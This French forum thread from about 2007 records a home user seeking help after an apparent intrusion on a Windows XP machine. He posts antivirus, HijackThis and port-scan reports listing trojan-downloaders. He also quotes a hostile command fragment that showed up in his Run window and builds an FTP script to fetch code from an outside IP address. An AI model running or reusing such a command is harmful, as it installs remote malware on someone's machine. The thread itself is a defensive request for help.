Hans

J'arrive apparemment bien tard , mais serait - il possible d'avoir un lien vers la derniere version valide de ShutDown XP ? merci d'avance.

Merci a tous et pour tout , j'espere que ce ne sera qu'un mauvais souvenir qui m'aura grace a vous appris quelquechose. hans si pbs je vous tiendrai au courant

La voila , tjs sur zebulon, la porte à coté : http://forum.zebulon.fr/index.php?showtopic=112391&st=15 pour le moment plus de manifestation malgré ces 2 ports qui restent ouverts....!

je n'arrive pas a trouver comment fermer ces 2 ports !

Plus de reponses ?

voila , j'ai tout fait ,mais sur mon autre post dans le forum on me dit de fermer le port 21 et le 427 et je ne sais pas comment faire , j'attends de trouver une reponse . merci pour tout

Ok, je vais fermer ces deux ports ,si je trouve comment le faire.......pour le firewall , c'est un materiel dans mon bewan 600g, et depuis ces problemes j'ai remis aussi celui de windows..

Voici les resultats du test Antivirus en ligne : KASPERSKY ON-LINE SCANNER REPORT Friday, January 05, 2007 6:06:42 AM Système d'exploitation : Microsoft Windows XP Professional, Service Pack 2 (Build 2600) Kaspersky On-line Scanner version : 5.0.83.0 Dernière mise à jour de la base antivirus Kaspersky : 4/01/2007 Enregistrements dans la base antivirus Kaspersky : 241756 Paramètres d'analyse Analyser avec la base antivirus suivante standard Analyser les archives vrai Analyser les bases de messagerie vrai Cible de l'analyse Poste de travail A:\ C:\ D:\ E:\ F:\ G:\ H:\ I:\ J:\ Z:\ Statistiques de l'analyse Total d'objets analysés 283564 Nombre de virus trouvés 4 Nombre d'objets infectés 20 / 0 Nombre d'objets suspects 0 Durée de l'analyse 04:51:43 Nom de l'objet infecté Nom du virus Dernière action C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\MSS.log L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010001.wid L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010002.wid L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010003.ci L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010003.wid L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010003.wsb L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010004.wid L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010005.wid L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010006.wid L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010010.wid L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010012.wid L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000 L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000 L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\Used0000.000 L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000 L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SystemIndex.Ntfy12.gthr L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\tmp.edb L'objet est verrouillé ignoré C:\Documents and Settings\All Users\Application Data\Microsoft\Search\Data\Applications\Windows\Windows.edb L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Application Data\Ditto\Ditto.db L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Cookies\index.dat L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Application Data\Ahead\Nero Home\bl.db L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Application Data\Ahead\Nero Home\bl.db-journal L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Application Data\Ahead\Nero Home\is2.db L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Application Data\Ahead\Nero Home\is2.db-journal L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Application Data\ApplicationHistory\cli.exe.c88dbd71.ini.inuse L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Application Data\Microsoft\Media Player\CurrentDatabase_219.wmdb L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Application Data\Microsoft\Outlook\Outlook.pst/Dossiers personnels/Éléments envoyés/12 Sep 2005 10:50 from Jean-François JANIN:Envoi d'un message : /eicar .txt Infecté : EICAR-Test-File ignoré C:\Documents and Settings\jfj\Local Settings\Application Data\Microsoft\Outlook\Outlook.pst Mail MS Mail: infecté - 1 ignoré C:\Documents and Settings\jfj\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Historique\History.IE5\index.dat L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Historique\History.IE5\MSHist012007010420070105\index.dat L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Temp\Perflib_Perfdata_87c.dat L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Temp\Perflib_Perfdata_b98.dat L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Temp\Perflib_Perfdata_bb8.dat L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Temp\~DF220.tmp L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Temp\~DFB850.tmp L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Temp\~DFD247.tmp L'objet est verrouillé ignoré C:\Documents and Settings\jfj\Local Settings\Temporary Internet Files\Content.IE5\index.dat L'objet est verrouillé ignoré C:\Documents and Settings\jfj\ntuser.dat L'objet est verrouillé ignoré C:\Documents and Settings\jfj\ntuser.dat.LOG L'objet est verrouillé ignoré C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat L'objet est verrouillé ignoré C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG L'objet est verrouillé ignoré C:\Documents and Settings\LocalService\ntuser.dat L'objet est verrouillé ignoré C:\Documents and Settings\LocalService\ntuser.dat.LOG L'objet est verrouillé ignoré C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat L'objet est verrouillé ignoré C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG L'objet est verrouillé ignoré C:\Documents and Settings\NetworkService\NTUSER.DAT L'objet est verrouillé ignoré C:\Documents and Settings\NetworkService\ntuser.dat.LOG L'objet est verrouillé ignoré C:\Program Files\Alwil Software\Avast4\DATA\aswResp.dat L'objet est verrouillé ignoré C:\Program Files\Alwil Software\Avast4\DATA\Avast4.db L'objet est verrouillé ignoré C:\Program Files\Alwil Software\Avast4\DATA\integ\avast.int L'objet est verrouillé ignoré C:\Program Files\Alwil Software\Avast4\DATA\log\AshWebSv.ws L'objet est verrouillé ignoré C:\Program Files\Alwil Software\Avast4\DATA\log\aswMaiSv.log L'objet est verrouillé ignoré C:\Program Files\Alwil Software\Avast4\DATA\log\nshield.log L'objet est verrouillé ignoré C:\Program Files\Alwil Software\Avast4\DATA\report\Protection résidente.txt L'objet est verrouillé ignoré C:\System Volume Information\MountPointManagerRemoteDatabase L'objet est verrouillé ignoré C:\WINDOWS\CSC\00000001 L'objet est verrouillé ignoré C:\WINDOWS\Debug\PASSWD.LOG L'objet est verrouillé ignoré C:\WINDOWS\SchedLgU.Txt L'objet est verrouillé ignoré C:\WINDOWS\SoftwareDistribution\ReportingEvents.log L'objet est verrouillé ignoré C:\WINDOWS\Sti_Trace.log L'objet est verrouillé ignoré C:\WINDOWS\system32\CatRoot2\edb.log L'objet est verrouillé ignoré C:\WINDOWS\system32\CatRoot2\tmp.edb L'objet est verrouillé ignoré C:\WINDOWS\system32\config\ACEEvent.evt L'objet est verrouillé ignoré C:\WINDOWS\system32\config\Antivirus.Evt L'objet est verrouillé ignoré C:\WINDOWS\system32\config\AppEvent.Evt L'objet est verrouillé ignoré C:\WINDOWS\system32\config\default L'objet est verrouillé ignoré C:\WINDOWS\system32\config\default.LOG L'objet est verrouillé ignoré C:\WINDOWS\system32\config\ODiag.evt L'objet est verrouillé ignoré C:\WINDOWS\system32\config\OSession.evt L'objet est verrouillé ignoré C:\WINDOWS\system32\config\SAM L'objet est verrouillé ignoré C:\WINDOWS\system32\config\SAM.LOG L'objet est verrouillé ignoré C:\WINDOWS\system32\config\SecEvent.Evt L'objet est verrouillé ignoré C:\WINDOWS\system32\config\SECURITY L'objet est verrouillé ignoré C:\WINDOWS\system32\config\SECURITY.LOG L'objet est verrouillé ignoré C:\WINDOWS\system32\config\software L'objet est verrouillé ignoré C:\WINDOWS\system32\config\software.LOG L'objet est verrouillé ignoré C:\WINDOWS\system32\config\SysEvent.Evt L'objet est verrouillé ignoré C:\WINDOWS\system32\config\system L'objet est verrouillé ignoré C:\WINDOWS\system32\config\system.LOG L'objet est verrouillé ignoré C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR L'objet est verrouillé ignoré C:\WINDOWS\system32\wbem\Repository\FS\INDEX.MAP L'objet est verrouillé ignoré C:\WINDOWS\system32\wbem\Repository\FS\MAPPING.VER L'objet est verrouillé ignoré C:\WINDOWS\system32\wbem\Repository\FS\MAPPING1.MAP L'objet est verrouillé ignoré C:\WINDOWS\system32\wbem\Repository\FS\MAPPING2.MAP L'objet est verrouillé ignoré C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA L'objet est verrouillé ignoré C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.MAP L'objet est verrouillé ignoré C:\WINDOWS\Temp\Perflib_Perfdata_1f8.dat L'objet est verrouillé ignoré C:\WINDOWS\Temp\Perflib_Perfdata_2a0.dat L'objet est verrouillé ignoré C:\WINDOWS\Temp\usgthrsvc\Perflib_Perfdata_814.dat L'objet est verrouillé ignoré C:\WINDOWS\Temp\_avast4_\Webshlock.txt L'objet est verrouillé ignoré C:\WINDOWS\wiadebug.log L'objet est verrouillé ignoré C:\WINDOWS\wiaservc.log L'objet est verrouillé ignoré C:\WINDOWS\WindowsUpdate.log L'objet est verrouillé ignoré C:\WINDOWS\{00000002-00000000-0000000A-00001102-00000004-20021102}.CDF L'objet est verrouillé ignoré D:\System Volume Information\MountPointManagerRemoteDatabase L'objet est verrouillé ignoré E:\System Volume Information\MountPointManagerRemoteDatabase L'objet est verrouillé ignoré F:\System Volume Information\MountPointManagerRemoteDatabase L'objet est verrouillé ignoré F:\TELECHARGEMENT-V_3\BUREAUTIQUE\Compression\Winrar 3.6 fr+c\v3.6 final fr\WinRAR_3.6.exe/data.rar/Zip.SFX Infecté : Trojan-Downloader.Win32.Banload.ams ignoré F:\TELECHARGEMENT-V_3\BUREAUTIQUE\Compression\Winrar 3.6 fr+c\v3.6 final fr\WinRAR_3.6.exe/data.rar Infecté : Trojan-Downloader.Win32.Banload.ams ignoré F:\TELECHARGEMENT-V_3\BUREAUTIQUE\Compression\Winrar 3.6 fr+c\v3.6 final fr\WinRAR_3.6.exe RarSFX: infecté - 2 ignoré F:\TELECHARGEMENT-V_3\BUREAUTIQUE\Compression\Winrar 3.6 fr+c\wrar360fr.exe/data.rar/Zip.SFX Infecté : Trojan-Downloader.Win32.Banload.ams ignoré F:\TELECHARGEMENT-V_3\BUREAUTIQUE\Compression\Winrar 3.6 fr+c\wrar360fr.exe/data.rar Infecté : Trojan-Downloader.Win32.Banload.ams ignoré F:\TELECHARGEMENT-V_3\BUREAUTIQUE\Compression\Winrar 3.6 fr+c\wrar360fr.exe RarSFX: infecté - 2 ignoré F:\TELECHARGEMENT-V_3\OUTILS SYSTEME\REPARATION & defrag\PowerIE6\FixMTU.exe Infecté : Trojan-Downloader.Win32.VB.afg ignoré G:\DOC perso\E-Mails\Messages OE_090206\J Bescond (1).dbx/[From =?Windows-1252?Q?Jean-Fran=E7ois_JANIN?= ][Date Sun, 12 Dec 2004 12:52:42 +0100]/UNNAMED/eicar Infecté : EICAR-Test-File ignoré G:\DOC perso\E-Mails\Messages OE_090206\J Bescond (1).dbx/[From =?Windows-1252?Q?Jean-Fran=E7ois_JANIN?= ][Date Sun, 12 Dec 2004 12:52:42 +0100]/UNNAMED Infecté : EICAR-Test-File ignoré G:\DOC perso\E-Mails\Messages OE_090206\J Bescond (1).dbx Mail MS Outlook 5: infecté - 2 ignoré G:\System Volume Information\MountPointManagerRemoteDatabase L'objet est verrouillé ignoré G:\S_TELECHARGEMENT-V_3\BUREAUTIQUE\Compression\Winrar 3.6 fr+c\v3.6 final fr\WinRAR_3.6.exe/data.rar/Zip.SFX Infecté : Trojan-Downloader.Win32.Banload.ams ignoré G:\S_TELECHARGEMENT-V_3\BUREAUTIQUE\Compression\Winrar 3.6 fr+c\v3.6 final fr\WinRAR_3.6.exe/data.rar Infecté : Trojan-Downloader.Win32.Banload.ams ignoré G:\S_TELECHARGEMENT-V_3\BUREAUTIQUE\Compression\Winrar 3.6 fr+c\v3.6 final fr\WinRAR_3.6.exe RarSFX: infecté - 2 ignoré G:\S_TELECHARGEMENT-V_3\BUREAUTIQUE\Compression\Winrar 3.6 fr+c\wrar360fr.exe/data.rar/Zip.SFX Infecté : Trojan-Downloader.Win32.Banload.ams ignoré G:\S_TELECHARGEMENT-V_3\BUREAUTIQUE\Compression\Winrar 3.6 fr+c\wrar360fr.exe/data.rar Infecté : Trojan-Downloader.Win32.Banload.ams ignoré G:\S_TELECHARGEMENT-V_3\BUREAUTIQUE\Compression\Winrar 3.6 fr+c\wrar360fr.exe RarSFX: infecté - 2 ignoré G:\S_TELECHARGEMENT-V_3\OUTILS SYSTEME\REPARATION & defrag\PowerIE6\FixMTU.exe Infecté : Trojan-Downloader.Win32.VB.afg ignoré G:\TIF\Temporary Internet Files\Content.IE5\183XXW7N\exitpop[1].htm Infecté : Trojan.JS.NoClose.a ignoré H:\System Volume Information\MountPointManagerRemoteDatabase L'objet est verrouillé ignoré I:\System Volume Information\MountPointManagerRemoteDatabase L'objet est verrouillé ignoré J:\System Volume Information\MountPointManagerRemoteDatabase L'objet est verrouillé ignoré Analyse terminée.

non, je ne me souviens pas avoir ouvert le port 21 , je pensais d'ailleurs que celui ci etait tjs ouvert par defaut.......que dois-je faire maintenant ? Serait-il preferable de remettre en place une image-disque anterieure aux pbs ?

non , ou plutot je ne sais pas , ou faut il aller chercher tout ça ?

Voila , le nouveau lien fonctionne et j'ai suivi tes conseils : tout est vert , sauf un port 21 rouge et un autre bleu ?, ? mais je n'y vois pas tres clair dans le raport qui suit : GRC Port Authority Report created on UTC: 2007-01-04 at 18:37:31 Results from scan of ports: 0-1055 1 Ports Open 1 Ports Closed 1054 Ports Stealth --------------------- 1056 Ports Tested The port found to be OPEN was: 21 The port found to be CLOSED was: 477 Other than what is listed above, all ports are STEALTH. TruStealth: FAILED - NOT all tested ports were STEALTH, - NO unsolicited packets were received, - NO Ping reply (ICMP Echo) was received. Si tu peux m'en dire plus....§ merci je te le copie

J'ai effectivement installé VNC sur toutes les machines de mon reseau.Comme tu me l'a conseillé , je viens de l'arreter , mais j'hesite a le desinstaller car je le trouve assez pratique , mais si tu insistes je le ferai. Par ailleurs j'ai active les defenses DoS et la detection des scan de ports dans le firewall materiel de mon routeur et c'est peut-etre pour cela que je n'ai pas eu de problemes "visibles" hier et aujourd'hui. Actuellement les messages qui m'ont alertes n'apparaissent plus et je n'observe rien de particulier sur ma machine , mais s'il le faut je peux restaurer une image disque anterieure a mes ennuis. J'attends donc vos conseils car j'angoisse un peu a la pensee d'une action possible de cet individu sur ma machine. PS : je dois aussi recommencer un test kaspersky , et comme il est long je vais essayer de le faire dans la nuit. encore merci de vous occuper de mes "miseres"

Je t'enverrai demain le raport Kaspersky , car le scan est tres long et immobilise ma machine , je l'ai debuté mais n'ai pas pu aller au bout. Je vais le relancer cette nuit.

Desolé , mais sur ton lien il n'y a aucune indication : All services ports

J'ai bien essayé ton lien , mais je ne comprends pas grand chose a ce truc ! ! ! merci quand meme . J'ai poste le rapport hijackthis dans la section securite de ce meme forum , mais pas de resultats pour le moment.

Ok , je trouve maintenant ta repônse ,et j'ai lance blacklight, je poste les resultats du log ci-apres : 01/03/07 15:50:03 [info]: BlackLight Engine 1.0.55 initialized 01/03/07 15:50:03 [info]: OS: 5.1 build 2600 (Service Pack 2) 01/03/07 15:50:04 [Note]: 7019 4 01/03/07 15:50:04 [Note]: 7005 0 01/03/07 15:50:40 [Note]: 7006 0 01/03/07 15:50:40 [Note]: 7011 2552 01/03/07 15:50:40 [Note]: 7026 0 01/03/07 15:50:40 [Note]: 7026 0 01/03/07 15:50:47 [Note]: FSRAW library version 1.7.1021 Blacklight me precise : no item found Par contre je ne comprends pas tres bien ce que tu voulais dire ici : "laisse [X]scan through Windows Explorer activé" Merci encore pour ton aide

J'ai un firewall materiel sur un routeur et pas de firewall logiciel, on m'avais dit que c'etait mieux ainsi......tu parles....! ! !

Merci de me repondre , je connais neotrace et tcpview mais ça ne me donne pas la solution pour me debarrasser du pb. Ce probleme vient de se reproduire,la meme fenetre "cmd.exe",que cellle d'hier s'est ouverte a l'ecran , avec une nouvelle IP , et un n° de port et de dossier get different,....? ça commence a m'inquieter ce cirque......car je n'y comprends pas grand chose !

Le probleme vient de se reproduire,la meme fenetre "cmd.exe",que cellle d'hier s'est ouverte a l'ecran , avec une nouvelle IP , et un n° de port et de dossier get different,....? ça commence a m'inquieter ce cirque......car je n'y comprends pas grand chose !

Tout d'abord , grand merci pour ton aide dans ce moment delicat....on se sent ainsi moins seul face a ses ennuis....! j'ai effectué tous les points indiques dans ta precedente reponse , et aucun virus ou autre intrus n'a ete trouvé sur ma machine.Le dernier scan Kaspersky est en cours, et va certainement durer un bon moment....! Par ailleurs a l'utilisation je ne remarque aucune modification particuliere jusqu'à present ,MAIS , j'ai cependant vu surgir toute seule il me semble ,et a 2 ou 3 reprises ,la fenetre "Executer" ( au dessus du bouton demarrer ), elle contient entre autre les 2 lignes suivantes qui m'intriguent un peu : cmd.exe/c deli&echo open 82.250.54.34 8265>i&echo cmd.exe/c deli&echo àpen 82.250.1.78 30365>i&echo je reconnais sur la ligne inferieure le n° du port sollicité hier : 30365 !!!!, et je n'ai pas tapé ces lignes bizarres.......mais peut-etre que ça n'a rien a voir..... Voila pour le moment , je te tiens au courant a la fin du scan AV. Encore merci .

Comme conseillé sur ce meme forum , je communique ci dessous mon rapport Hijackthis , merci de m'aider a l'analyser , j'ai deja supprimé a tout hazard la reference n°20, mais peut-etre ai-je eu tort ? Logfile of HijackThis v1.99.1 Scan saved at 23:19:46, on 01/01/2007 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Fichiers communs\Acronis\Schedule2\schedul2.exe C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe C:\Program Files\Alwil Software\Avast4\ashServ.exe C:\WINDOWS\system32\CTSvcCDA.EXE C:\WINDOWS\Explorer.EXE C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe C:\Program Files\Norton Utilities\NPROTECT.EXE C:\Program Files\Speed Disk\nopdb.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\ups.exe C:\PROGRA~1\UpsPilot\Winpower.exe C:\Program Files\RealVNC\VNC4\WinVNC4.exe C:\WINDOWS\system32\MsPMSPSv.exe C:\WINDOWS\system32\WgaTray.exe C:\WINDOWS\system32\SearchIndexer.exe C:\Program Files\Alwil Software\Avast4\ashWebSv.exe C:\PROGRA~1\UpsPilot\monitor.exe C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe C:\PROGRA~1\BILLPS~1\WINPAT~1\winpatrol.exe C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe C:\WINDOWS\system32\CTHELPER.EXE C:\Program Files\Acronis\TrueImage\TrueImageMonitor.exe C:\Program Files\Fichiers communs\Acronis\Schedule2\schedhlp.exe C:\Program Files\ATI Technologies\ATI.ACE\CLI.EXE C:\Program Files\ThiWeb Live\thiweblive.exe C:\Program Files\Saitek\Software\ProfilerU.exe C:\Program Files\Saitek\Software\SaiMfd.exe C:\Program Files\Creative\MediaSource\RemoteControl\RCMan.EXE C:\PROGRA~1\Cacheman\Cacheman.exe C:\PROGRA~1\UpsPilot\hello21.exe C:\WINDOWS\system32\ctfmon.exe C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe C:\Program Files\ThiWeb Live\tlmaj.exe C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexStoreSvr.exe C:\Program Files\Ditto\Ditto.exe C:\FRAPS\FRAPS.EXE D:\FB version 4.05_X45+ffb2_CF4\JOYTOCKEY\JoyToKey.exe C:\Program Files\PrintKey 2000 Fr\Printkey 2000 Fr.exe C:\Program Files\2BrightSparks\SyncBack\SyncBack.exe C:\Program Files\ATI Technologies\ATI.ACE\cli.exe C:\Program Files\ATI Technologies\ATI.ACE\cli.exe C:\Program Files\Zeb-Utility\Zeb-Utility.exe C:\Program Files\Skype\Phone\Skype.exe C:\Program Files\Skype\Plugin Manager\SkypePM.exe C:\Documents and Settings\jfj\Bureau\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.phoenixjp.net/news/fr/ R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens O2 - BHO: HelperObject Class - {00C6482D-C502-44C8-8409-FCE54AD9C208} - C:\Program Files\TechSmith\SnagIt 7\SnagItBHO.dll O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\PROGRA~1\Skype\Phone\IEPlugin\SKYPEI~1.DLL O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll O3 - Toolbar: SnagIt - {8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - C:\Program Files\TechSmith\SnagIt 7\SnagItIEAddin.dll O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe O4 - HKLM\..\Run: [sBDrvDet] C:\Program Files\Creative\SB Drive Det\SBDrvDet.exe /r O4 - HKLM\..\Run: [updReg] C:\WINDOWS\UpdReg.EXE O4 - HKLM\..\Run: [WinPatrol] C:\PROGRA~1\BILLPS~1\WINPAT~1\winpatrol.exe O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe" O4 - HKLM\..\Run: [DiskeeperSystray] "C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe" O4 - HKLM\..\Run: [CTHelper] CTHELPER.EXE O4 - HKLM\..\Run: [TrueImageMonitor.exe] C:\Program Files\Acronis\TrueImage\TrueImageMonitor.exe O4 - HKLM\..\Run: [Acronis Scheduler2 Service] "C:\Program Files\Fichiers communs\Acronis\Schedule2\schedhlp.exe" O4 - HKLM\..\Run: [ATICCC] "C:\Program Files\ATI Technologies\ATI.ACE\CLIStart.exe" O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Fichiers communs\Ahead\Lib\NeroCheck.exe O4 - HKLM\..\Run: [ThiWebLive] C:\Program Files\ThiWeb Live\thiweblive.exe O4 - HKLM\..\Run: [Profiler] C:\Program Files\Saitek\Software\ProfilerU.exe O4 - HKLM\..\Run: [saiMfd] C:\Program Files\Saitek\Software\SaiMfd.exe O4 - HKLM\..\RunServices: [Winpower] C:\Program Files\UpsPilot\Winpower.exe O4 - HKCU\..\Run: [RemoteCenter] C:\Program Files\Creative\MediaSource\RemoteControl\RCMan.EXE O4 - HKCU\..\Run: [Cacheman] C:\PROGRA~1\Cacheman\Cacheman.exe O4 - HKCU\..\Run: [skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [bgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe" O4 - HKCU\..\Run: [Ditto] C:\Program Files\Ditto\Ditto.exe O4 - HKCU\..\Run: [Fraps] C:\FRAPS\FRAPS.EXE O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe O4 - Startup: JoyToKey.exe.lnk = D:\FB version 4.05_X45+ffb2_CF4\JOYTOCKEY\JoyToKey.exe O4 - Startup: PrintKey 2000 Fr.lnk = C:\Program Files\PrintKey 2000 Fr\Printkey 2000 Fr.exe O4 - Startup: SyncBack.lnk = C:\Program Files\2BrightSparks\SyncBack\SyncBack.exe O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office12\EXCEL.EXE/3000 O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\PROGRA~1\Skype\Phone\IEPlugin\SKYPEI~1.DLL O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O15 - Trusted Zone: http://toolbar.imageshack.us O17 - HKLM\System\CCS\Services\Tcpip\..\{BCDD79E1-A50B-405D-8CCD-EA6CC54AA01C}: NameServer = 192.168.1.1,212.27.32.176 O18 - Protocol: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Program Files\Fichiers communs\Microsoft Shared\Help\hxds.dll O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FICHIE~1\Skype\SKYPE4~1.DLL O18 - Filter hijack: text/xml - {807563E5-5146-11D5-A672-00B0D022E945} - C:\PROGRA~1\FICHIE~1\MICROS~1\OFFICE12\MSOXMLMF.DLL O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll O23 - Service: Acronis Scheduler2 Service (AcrSch2Svc) - Acronis - C:\Program Files\Fichiers communs\Acronis\Schedule2\schedul2.exe O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe O23 - Service: avast! Antivirus - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashServ.exe O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe" /service (file missing) O23 - Service: avast! Web Scanner - Unknown owner - 